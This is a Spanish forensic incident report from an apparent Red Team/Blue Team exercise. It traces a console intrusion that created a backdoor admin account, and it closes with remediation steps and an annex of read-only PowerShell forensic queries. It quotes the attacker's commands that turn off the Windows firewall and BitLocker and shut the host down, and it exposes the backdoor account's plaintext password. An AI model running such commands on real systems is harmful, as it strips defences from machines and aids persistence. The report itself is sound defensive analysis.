5.3.2 Correlación con Security Event Log (25 de marzo de 2026)

Sesión 1 — Acceso, reconocimiento y persistencia (13:32 — 13:48)

- **13:32:41:** Login interactivo (user2, LogonType 2).
- **(Sin Log):** `netsh advfirewall set allprofiles state off` y `manage-bde -off C:`.
- **13:43:32:** Creación de la cuenta yishiego con elevación a Administradores a las 13:43:55.
- **(Sin Log):** Exploración de rutas de la aplicación web.
- **13:48:09:** Cierre del servicio de log por el apagado de la máquina (`shutdown /s /t 0`).

Sesión 2 — Verificación post-reinicio (13:56 — 14:01)

Login interactivo a las 14:01:14 y Logout a las 14:01:48 (~34 segundos de sesión). No hay comandos adicionales registrados, probablemente usada para verificar que la cuenta yishiego persistía tras el reinicio.

5.3.3 Cobertura de Sysmon durante el ataque

El servicio Sysmon (WinNetSvc) registró **2.607 eventos**. Sin embargo, **no se capturaron eventos de creación de procesos (ID 1)**.

Causa: La configuración del Blue Team estaba diseñada para detectar webshells y movimiento lateral, monitoreando procesos hijos de IIS (w3wp.exe). Las sesiones interactivas de consola (LogonType 2) **no estaban cubiertas**.

5.3.4 Hallazgo Confirmado: Cuenta Backdoor yishiego

- **Fecha de creación:** 25/03/2026 13:43:32.

- **Contraseña: ~~EstuveAqui~~. 1234** (expuesta en historial).
- **Persistencia sin uso:** Sin login registrado (LastLogon vacío), creada como mecanismo de **persistencia para uso futuro**.
- **Atacante minimalista:** La única acción detectada fue la creación de esta cuenta y el reconocimiento de archivos.

5.4 Determinación del vector de entrada (fallo web o acceso físico)

Determinación: Acceso físico a la consola de la máquina virtual con **credenciales conocidas de user2**.

Evidencia que sustenta esta conclusión:

- **Security Event ID 4624:** Dos logins de user2 con LogonType 2 (interactivo local) desde 127.0.0.1.
- **Firewall:** Política estricta (solo 80/443 abiertos) y SSH desinstalado (imposible acceso remoto).
- **Webroot:** Archivos intactos (fecha 03/03/2026). Sin webshells ni archivos añadidos.
- **Sysmon ID 1 & 3:** Sin procesos hijos sospechosos de IIS ni conexiones salientes anómalas.
- **Logs de IIS:** Sin peticiones sospechosas en el periodo de exposición.

Conclusión: El Red Team accedió mediante la **consola de la máquina virtual** usando las credenciales de user2.

5.5 Cronología del ataque y alcance del compromiso (datos exfiltrados, persistencia)

5.5.1 Cronología del Incidente

```
gantt
    title Cronología del Incidente
    dateFormat YYYY-MM-DD
    axisFormat %d/%m
```

```

section Blue Team - Despliegue
Despliegue aplicación SecureCatalog      :done, 2026-03-03, 1d
Hardening completo + nuke.ps1            :done, 2026-03-04, 1d

section Red Team - Compromiso
Sesión 1 - Creación cuenta yishiego      :crit, 2026-03-25, 1d
Sesión 2 - Verificación post-reinicio    :crit, 2026-03-25, 1d

section Blue Team - Recuperación
Recuperación de la máquina                :done, 2026-04-07, 1d

```

5.5.2 Alcance del Compromiso

- **Confidencialidad:** Reconocimiento de la estructura de la app web (SecureCatalog). Sin evidencia de exfiltración de datos.
- **Integridad:** Cuenta backdoor yishiego creada. Firewall desactivado (`netsh advfirewall set allprofiles state off`). BitLocker desactivado.
- **Disponibilidad:** Sistema apagado por el atacante (`shutdown /s /t 0`). Sin impacto permanente sobre SecureCatalog.

5.6 Recomendaciones de Remediación

Las siguientes acciones **NO fueron ejecutadas** durante el análisis para preservar la integridad forense:

1. **Desactivar y eliminar la cuenta yishiego** inmediatamente.
2. **Cambiar la contraseña de user2** (el Red Team la conoce).
3. **Ampliar reglas de Sysmon** para incluir `Process Create` en sesiones interactivas de consola (`LogonType 2`).
4. **Auditar accesos futuros** y configurar alertas en Wazuh para eventos 4720 (creación de cuentas).
5. **Restringir acceso físico** a la máquina virtual.

5.7 Anexo: Comandos Forenses Ejecutados

Lista completa de comandos ejecutados durante el análisis forense (solo lectura, sin modificación del sistema):

```
# --- RFC 3227: Datos volátiles (Prioridad 1-2) ---
Get-NetTCPConnection | Where-Object {$_.State -eq 'Established' -or $_.State -eq 'Listen'}
Get-Process | Select-Object Id, ProcessName, Path, StartTime | Sort-Object StartTime

# --- Sesiones y logons (Prioridad 3) ---
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624}
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624; StartTime='2026-03-05'; EndTime='2026-04-07'}
| Where-Object { $_.Properties[8].Value -eq 2 } # Solo LogonType 2

# --- Eventos de gestión de cuentas ---
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720,4722,4724,4725; StartTime='2026-03-05'; EndTime='2026-04-07'}
Get-WinEvent -FilterHashtable @{LogName='Security'; StartTime='2026-03-05'; EndTime='2026-03-25 14:30:00'}

# --- Sysmon (Prioridad 4) ---
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1; StartTime='2026-03-04'; EndTime='2026-04-07'}
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1; StartTime='2026-03-04'; EndTime='2026-04-07'}
| Group-Object { $_.TimeCreated.ToString('yyyy-MM-dd') } # Distribución por día
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1; StartTime='2026-03-25'; EndTime='2026-03-26'} # Registry events del día 25
Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -MaxEventCount 1000

# --- Artefactos de persistencia (Prioridad 5) ---
Get-LocalUser | Select-Object Name, SID, Enabled, LastLogon, PasswordLastSet
Get-LocalGroupMember -Group 'Administradores'
Get-Service WinNetSvc | Select-Object Name, Status, StartType
Get-ScheduledTask | Where-Object {$_.State -ne 'Disabled'}
Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'}

# --- Archivos en disco (Prioridad 6) ---
Get-ChildItem 'C:\inetpub\wwwroot\SecureCatalog\' -Recurse
```

```
Get-FileHash 'C:\Windows\WinNetSvc.exe' -Algorithm SHA256
Get-Content 'C:\Windows\System32\Drivers\en-US\NetworkData\InternalAu
Get-Content 'C:\Windows\System32\Config\TxR\Diagnostics\sys_data.dat'
Select-String -Path 'C:\Windows\System32\Config\TxR\Diagnostics\sys_da
Get-Content 'C:\inetpub\wwwroot\SecureCatalog\appsettings.json'
```

Fase 4: Securización Reactiva y Mejora de la Calidad

- 6.1 Análisis de Causa Raíz (RCA) del incidente**
- 6.2 Remediación (refactorización de código, parcheo y endurecimiento de políticas)**
- 6.3 Definición de Métricas de Calidad y KPIs futuros**

Evaluación Final y Acuerdos de Nivel de Servicio (SLA)

- 7.1 Registro de incidentes de seguridad e impacto operativo**
- 7.2 Balance de créditos de negocio según la matriz de penalizaciones y bonificaciones**
- 7.3 Registro de “Requests for Information” (RFI) o consultorías técnicas solicitadas**

Apéndices

Anexo I: “Prompt Maestro” utilizado para la generación del código

Apéndice B

Anexo II: Código fuente de la aplicación
